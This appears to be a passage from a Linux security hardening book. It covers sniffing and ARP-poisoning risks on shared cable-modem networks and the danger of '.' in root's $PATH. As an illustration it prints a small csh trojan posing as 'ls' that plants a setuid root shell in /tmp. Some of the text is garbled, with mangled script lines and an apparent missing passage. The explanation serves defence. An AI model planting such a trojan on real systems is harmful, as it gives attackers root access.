Cable Modems

Danger Level

Cable modems are now quite common for providing Internet access to home systems. They have high bandwidth and are reasonably reliable, though less so than standard modem or DSL service. Home users are not used to worrying much about security because a modem on a

standard (analog) phone is a private connection into the ISP's equipment that transports only that user's data. In other words, communication via modem is private in that nobody else can sniff your data if they do not have direct access to your home network or to the network of whatever remote system you are interacting with.

The rules are different with cable modems, however. All the cable modems in a neighborhood of up to 100 or so systems are in a local area network (LAN) configuration. Windows users who enable "Network neighborhood" discover this when 10 or 100 systems they never heard of pop up on their desktop window. Regardless of whether you are running Linux, Windows, or something else, this opens up serious security holes. These other systems can sniff the network for any unencrypted data that you transmit, such as passwords supplied for telnet, FTP, POP, or IMAP. Note that some modern cable systems do not have the problem because they use true routers to protect each customer. Some DSL connections might have this problem as do some wireless arrangements.

The solution is to use only encrypted protocols such as SSL and SSH. Keep in mind too that this opens up your systems to various protocol-level exploits that require access to your LAN. These exploits include spoofed UDP and TCP addresses (because the cracker can see your response through the use of Promiscuous mode on his system even though it is not sent to his "real" address). Other exploits are available by poisoning your ARP cache and by his changing your system's MAC address or his. See "Preventing ARP Cache Poisoning" for discussion on poisoning ARP caches.

The solution is to act as if you have untrusted people on the LAN, because you do. Certainly, if you have any non-Linux systems, you will want to configure your Linux box as a firewall. You

should send all confidential data via a good encryption method such as SSH or SSL. DSL does not seem to suffer from this LAN problem.

3.3.2 $PATH: Values of . Give Rise to Doom

Danger Level

As many people know, the $PATH environment variable contains a list of directories to search to find the program that the user has requested be executed. It is used if there is no slash in the program name. Typically it contains directories such as /bin, /usr/bin, /usr/local/ bin, perhaps $HOME/bin, etc.

The title of this section is inspired from the error message given by the UNIX Version 6 rmdir command if one tried to rmdir ".", except that "doom" was mistyped as "dom" until I pointed this out.

For ordinary users and for root, commonly it also contains "." specifying one's current

directory. This is convenient when one develops or uses locally developed scripts or programs. It saves the bother of typing ./widget.

For root, it is one of the worst security holes possible on Linux! A SysAdmin operating as root frequently can be found in almost any directory in the system, including /tmp, home directories of users who might have been compromised or even may be malicious, and directories where insecure applications may be found.

Worse still, frequently "." is listed first in the search path. Thus, all a cracker needs to do is place scripts or programs in such directories with the same name as programs commonly invoked by root, such as ls, who, ps, favorite_editor, etc. For ls, all that would be required would be

#!/bin/csh

if ( ! -o /bin/su ) goto finish cp /bin/sh /tmp/.sh

chmod 4755 /tmp/.sh finish:

exec /bin/ls $argv | grep -v ls

reason for this is to block this exploit. Perhaps this feature should be added to the other shells. That would not slow someone down by much because using chmod would work almost as well as would cp, dd, or a host of other programs. The rule should be that root absolutely not have "." in the search path and if other users do, that "." is at the very end of the search path. Thus, even ordinary users will not be compromised by this very common technique. This even would slightly speed up the system.

Note that some intruders have been known to create such traps with mistyped names of common programs hoping that someone then would mistype one. Such a trap would catch someone having "." at the end of the search path. This is why root should not have "." anywhere in the search path. The consequences of root having "." in $PATH are too great to allow the risk. Also, it is an excellent idea to do a periodic /bin/ls of directories such as /tmp, /usr/ tmp, /var/tmp, FTP's directories, those where CGIs play, and users to ensure that these traps have not been planted. An alternative to typing the full path name (/bin/ls) would be to run it from a trusted directory, such as /root, thusly

cd /root ls /tmp ls /usr/tmp

etc.

The periodic use of find, invoked from root's crontab would be an excellent idea.